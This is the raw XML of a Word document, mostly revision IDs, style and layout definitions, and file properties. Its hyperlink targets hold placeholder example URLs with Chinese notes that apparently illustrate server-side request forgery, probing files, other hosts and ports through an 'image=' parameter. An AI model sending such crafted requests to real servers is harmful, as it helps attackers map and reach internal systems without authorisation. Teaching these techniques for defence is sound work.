    <w:rsid w:val="004218AF"/>
    <w:rsid w:val="00424875"/>
    <w:rsid w:val="00427EE6"/>
    <w:rsid w:val="00432B28"/>
    <w:rsid w:val="0044592B"/>
    <w:rsid w:val="004459A4"/>
    <w:rsid w:val="004541DE"/>
    <w:rsid w:val="00457EDF"/>
    <w:rsid w:val="00464CE0"/>
    <w:rsid w:val="0047276E"/>
    <w:rsid w:val="00476736"/>
    <w:rsid w:val="00490AE6"/>
    <w:rsid w:val="004B0819"/>
    <w:rsid w:val="004E07FE"/>
    <w:rsid w:val="004E2C9A"/>
    <w:rsid w:val="00502F01"/>
    <w:rsid w:val="00510092"/>
    <w:rsid w:val="00512A1D"/>
    <w:rsid w:val="00514A7F"/>
    <w:rsid w:val="00526BC3"/>
    <w:rsid w:val="00537150"/>
    <w:rsid w:val="00540F68"/>
    <w:rsid w:val="005453A7"/>
    <w:rsid w:val="005612B7"/>
    <w:rsid w:val="005620AD"/>
    <w:rsid w:val="00565720"/>
    <w:rsid w:val="005724AE"/>
    <w:rsid w:val="0057344E"/>
    <w:rsid w:val="005763D8"/>
    <w:rsid w:val="00576EFC"/>
    <w:rsid w:val="00596511"/>
    <w:rsid w:val="005A10D6"/>
    <w:rsid w:val="005A1124"/>
    <w:rsid w:val="005A503E"/>
    <w:rsid w:val="005C6249"/>
    <w:rsid w:val="005F51A0"/>
    <w:rsid w:val="005F7DA2"/>
    <w:rsid w:val="0060229B"/>
    <w:rsid w:val="00605F9F"/>
    <w:rsid w:val="00607492"/>
    <w:rsid w:val="0062047F"/>
    <w:rsid w:val="00621AB1"/>
    <w:rsid w:val="00622AD1"/>
    <w:rsid w:val="00630845"/>
    <w:rsid w:val="00631DEC"/>
    <w:rsid w:val="00634AA9"/>
    <w:rsid w:val="00635B27"/>
    <w:rsid w:val="00635DA3"/>
    <w:rsid w:val="00637594"/>
    <w:rsid w:val="006412EB"/>
    <w:rsid w:val="00657938"/>
    <w:rsid w:val="00657A74"/>
    <w:rsid w:val="006659C4"/>
    <w:rsid w:val="00667513"/>
    <w:rsid w:val="00670C92"/>
    <w:rsid w:val="00672CB0"/>
    <w:rsid w:val="00685627"/>
    <w:rsid w:val="006A1F61"/>
    <w:rsid w:val="006A5E08"/>
    <w:rsid w:val="006B0924"/>
    <w:rsid w:val="006B6995"/>
    <w:rsid w:val="006C2273"/>
    <w:rsid w:val="006C495D"/>
    <w:rsid w:val="006D0AD6"/>
    <w:rsid w:val="006D0F4F"/>
    <w:rsid w:val="006D2FF9"/>
    <w:rsid w:val="006D575E"/>
    <w:rsid w:val="006E7880"/>
    <w:rsid w:val="006F15F5"/>
    <w:rsid w:val="006F24AC"/>
    <w:rsid w:val="00704B46"/>
    <w:rsid w:val="00716EA6"/>
    <w:rsid w:val="00720558"/>
    <w:rsid w:val="00723720"/>
    <w:rsid w:val="0073089F"/>
    <w:rsid w:val="00733ED9"/>
    <w:rsid w:val="00737970"/>
    <w:rsid w:val="00743A4C"/>
    <w:rsid w:val="0074578B"/>
    <w:rsid w:val="00761E5D"/>
    <w:rsid w:val="007675D0"/>
    <w:rsid w:val="00776303"/>
    <w:rsid w:val="00782A32"/>
    <w:rsid w:val="00783259"/>
    <w:rsid w:val="0079387D"/>
    <w:rsid w:val="00793C22"/>
    <w:rsid w:val="007960FC"/>
    <w:rsid w:val="007A5477"/>
    <w:rsid w:val="007B3A85"/>
    <w:rsid w:val="007B77B7"/>
    <w:rsid w:val="007D30F7"/>
    <w:rsid w:val="007E605C"/>
    <w:rsid w:val="007F435B"/>
    <w:rsid w:val="0080430D"/>
    <w:rsid w:val="0081143A"/>
    <w:rsid w:val="0081257C"/>
    <w:rsid w:val="00830563"/>
    <w:rsid w:val="00833086"/>
    <w:rsid w:val="00836E0E"/>
    <w:rsid w:val="00842633"/>
    <w:rsid w:val="0085550B"/>
    <w:rsid w:val="0086229D"/>
    <w:rsid w:val="008832CF"/>
    <w:rsid w:val="008876A3"/>
    <w:rsid w:val="00890719"/>
    <w:rsid w:val="0089433B"/>
    <w:rsid w:val="00897604"/>
    <w:rsid w:val="008A5164"/>
    <w:rsid w:val="008A71BA"/>
    <w:rsid w:val="008C4F25"/>
    <w:rsid w:val="008C523D"/>
    <w:rsid w:val="008E3BCF"/>
    <w:rsid w:val="008F1A14"/>
    <w:rsid w:val="008F2226"/>
    <w:rsid w:val="008F2A26"/>
    <w:rsid w:val="008F2D62"/>
    <w:rsid w:val="008F6A79"/>
    <w:rsid w:val="009111AB"/>
    <w:rsid w:val="009114A6"/>
    <w:rsid w:val="00915DB6"/>
    <w:rsid w:val="00923BA5"/>
    <w:rsid w:val="00954CC8"/>
    <w:rsid w:val="00956A34"/>
    <w:rsid w:val="009619F0"/>
    <w:rsid w:val="00963C26"/>
    <w:rsid w:val="0097053A"/>
    <w:rsid w:val="0097207B"/>
    <w:rsid w:val="00976E0E"/>
    <w:rsid w:val="009901F8"/>
    <w:rsid w:val="00996754"/>
    <w:rsid w:val="009B2D75"/>
    <w:rsid w:val="009B5836"/>
    <w:rsid w:val="009C75BA"/>
    <w:rsid w:val="009C7BFE"/>
    <w:rsid w:val="009D4F69"/>
    <w:rsid w:val="009E78EF"/>
    <w:rsid w:val="009F7105"/>
    <w:rsid w:val="00A000B6"/>
    <w:rsid w:val="00A217EE"/>
    <w:rsid w:val="00A22872"/>
    <w:rsid w:val="00A265CB"/>
    <w:rsid w:val="00A40EE6"/>
    <w:rsid w:val="00A46888"/>
    <w:rsid w:val="00A53D17"/>
    <w:rsid w:val="00A6666A"/>
    <w:rsid w:val="00A8065A"/>
    <w:rsid w:val="00A83295"/>
    <w:rsid w:val="00A93029"/>
    <w:rsid w:val="00A97090"/>
    <w:rsid w:val="00AA0048"/>
    <w:rsid w:val="00AA323E"/>
    <w:rsid w:val="00AB2CD9"/>
    <w:rsid w:val="00AC1D53"/>
    <w:rsid w:val="00AC6BA3"/>
    <w:rsid w:val="00AD1475"/>
    <w:rsid w:val="00AD526F"/>
    <w:rsid w:val="00AE02AD"/>
    <w:rsid w:val="00AE08CE"/>
    <w:rsid w:val="00AF0135"/>
    <w:rsid w:val="00B00B69"/>
    <w:rsid w:val="00B069DD"/>
    <w:rsid w:val="00B11C70"/>
    <w:rsid w:val="00B12616"/>
    <w:rsid w:val="00B14E5D"/>
    <w:rsid w:val="00B27979"/>
    <w:rsid w:val="00B359DC"/>
    <w:rsid w:val="00B35A9B"/>
    <w:rsid w:val="00B6277E"/>
    <w:rsid w:val="00B6613E"/>
    <w:rsid w:val="00B73CCA"/>
    <w:rsid w:val="00B80390"/>
    <w:rsid w:val="00B8193C"/>
    <w:rsid w:val="00B87B3C"/>
    <w:rsid w:val="00B9588A"/>
    <w:rsid w:val="00B95C3B"/>
    <w:rsid w:val="00BB0E23"/>
    <w:rsid w:val="00BC441D"/>
    <w:rsid w:val="00BD240C"/>
    <w:rsid w:val="00BD28B0"/>
    <w:rsid w:val="00C05098"/>
    <w:rsid w:val="00C1332E"/>
    <w:rsid w:val="00C23F21"/>
    <w:rsid w:val="00C33216"/>
    <w:rsid w:val="00C4193B"/>
    <w:rsid w:val="00C41FC3"/>
    <w:rsid w:val="00C63A79"/>
    <w:rsid w:val="00C76F57"/>
    <w:rsid w:val="00C84C6C"/>
    <w:rsid w:val="00C863F1"/>
    <w:rsid w:val="00C952E4"/>
    <w:rsid w:val="00C97E3D"/>
    <w:rsid w:val="00CA13C3"/>
    <w:rsid w:val="00CA1C9A"/>
    <w:rsid w:val="00CA1DF0"/>
    <w:rsid w:val="00CA611A"/>
    <w:rsid w:val="00CB3987"/>
    <w:rsid w:val="00CB4688"/>
    <w:rsid w:val="00CB55CF"/>
    <w:rsid w:val="00CC1604"/>
    <w:rsid w:val="00CD1480"/>
    <w:rsid w:val="00CD5F96"/>
    <w:rsid w:val="00CE72D4"/>
    <w:rsid w:val="00CE7C42"/>
    <w:rsid w:val="00CE7D36"/>
    <w:rsid w:val="00D039E7"/>
    <w:rsid w:val="00D04BC7"/>
    <w:rsid w:val="00D11F9B"/>
    <w:rsid w:val="00D20373"/>
    <w:rsid w:val="00D218B7"/>
    <w:rsid w:val="00D34091"/>
    <w:rsid w:val="00D55CA8"/>
    <w:rsid w:val="00D66D98"/>
    <w:rsid w:val="00D75B52"/>
    <w:rsid w:val="00D92145"/>
    <w:rsid w:val="00DA02C7"/>
    <w:rsid w:val="00DA02CF"/>
    <w:rsid w:val="00DB53D2"/>
    <w:rsid w:val="00DC5D83"/>
    <w:rsid w:val="00DD296D"/>
    <w:rsid w:val="00DE2489"/>
    <w:rsid w:val="00DF662C"/>
    <w:rsid w:val="00E0317D"/>
    <w:rsid w:val="00E037AB"/>
    <w:rsid w:val="00E23570"/>
    <w:rsid w:val="00E30013"/>
    <w:rsid w:val="00E33C9B"/>
    <w:rsid w:val="00E36797"/>
    <w:rsid w:val="00E37CDA"/>
    <w:rsid w:val="00E44AF9"/>
    <w:rsid w:val="00E52E5D"/>
    <w:rsid w:val="00E62FD7"/>
    <w:rsid w:val="00E6756D"/>
    <w:rsid w:val="00E779A6"/>
    <w:rsid w:val="00E951AF"/>
    <w:rsid w:val="00EA0E76"/>
    <w:rsid w:val="00EA12E2"/>
    <w:rsid w:val="00EA432F"/>
    <w:rsid w:val="00EC0246"/>
    <w:rsid w:val="00ED7FAF"/>
    <w:rsid w:val="00EE0B76"/>
    <w:rsid w:val="00EE0D0C"/>
    <w:rsid w:val="00EE1857"/>
    <w:rsid w:val="00EE67CA"/>
    <w:rsid w:val="00EF305C"/>
    <w:rsid w:val="00F03470"/>
    <w:rsid w:val="00F036F2"/>
    <w:rsid w:val="00F11704"/>
    <w:rsid w:val="00F12B6A"/>
    <w:rsid w:val="00F15795"/>
    <w:rsid w:val="00F41BAD"/>
    <w:rsid w:val="00F433A1"/>
    <w:rsid w:val="00F43EA2"/>
    <w:rsid w:val="00F544E9"/>
    <w:rsid w:val="00F60478"/>
    <w:rsid w:val="00F609CC"/>
    <w:rsid w:val="00F64467"/>
    <w:rsid w:val="00F648F9"/>
    <w:rsid w:val="00F97F7F"/>
    <w:rsid w:val="00FB0785"/>
    <w:rsid w:val="00FC11EA"/>
    <w:rsid w:val="00FC66E6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ACBFB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{13048DE9-3D24-4890-8DA0-7BBA0476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FAD"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="隶书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7CA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7CA"/>
    <w:pPr>
      <w:spacing w:before="260" w:after="260" w:line="415" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="华文行楷" w:hAnsiTheme="majorHAnsi"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7CA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="260" w:after="260" w:line="415" w:lineRule="auto"/>
      <w:ind w:left="721"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="华文行楷"/>
      <w:b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7CA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="290" w:line="377" w:lineRule="auto"/>
      <w:ind w:leftChars="500" w:left="920"/>
      <w:outlineLvl w:val="3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3A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4091"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="29"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="319" w:lineRule="auto"/>
      <w:ind w:leftChars="500" w:left="920"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi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7CA"/>
    <w:rPr>
      <w:rFonts w:eastAsia="隶书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E67CA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="华文行楷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67CA"/>
    <w:rPr>
      <w:rFonts w:eastAsia="华文行楷"/>
      <w:b/>
      <w:bCs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E67CA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NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="006D0F4F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3833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3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F0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Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00314E5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E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E55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DefaultParagraphFont"/>
    <w:rsid w:val="00E23570"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003233AA"/>
    <w:rPr>
      <w:rFonts w:eastAsia="隶书"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="langwithname">
    <w:name w:val="langwithname"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343292"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0074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933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34091"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="隶书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7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67513"/>
    <w:rPr>
      <w:rFonts w:eastAsia="隶书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75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7513"/>
    <w:rPr>
      <w:rFonts w:eastAsia="隶书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228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22872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22872"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22872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7521">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="150"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F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19539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6129">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="150"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F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1765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842">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="150"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F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1380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339">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="150"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F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9294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14">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="150"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F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12209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5181">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="150"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F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4455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72">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="150"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
                    <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="11174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5833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4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205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2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802413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43884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069716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315266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734757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18257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377908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143860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955157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77614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2381160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841916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11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32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899183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425393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067866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368509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214051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569618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8743128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18661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762416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63274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48224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496963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35041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lmind.c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A.com/A.php?image=www.A.com/Image/A1.png&#65292;&#22914;&#26524;&#36820;&#22238;&#27491;&#30830;&#30340;&#22270;&#29255;&#65292;&#37027;&#20040;&#35828;&#26126;/Image/&#19979;&#38754;&#26377;A1.png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B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A.com/A.php?image=www.A.com/Image/A.png" TargetMode="External"/><Relationship Id="rId25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A.com/A.php?image=www.B.com/Image/B.png&#26126;&#26174;B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://www.A.com/A.php?image=www.A.com:8888/Image/A.png&#20363;&#22914;&#25105;&#20204;&#36755;&#20837;88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nblogs.com/ONDragon/p/6897967.html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8F32-74CA-4156-8C08-8CA61831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7</Pages>
  <Words>2584</Words>
  <Characters>14729</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>122</Lines>
  <Paragraphs>34</Paragraphs>
  <ScaleCrop>false</ScaleCrop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oft</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>369</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-29T06:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-07T12:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>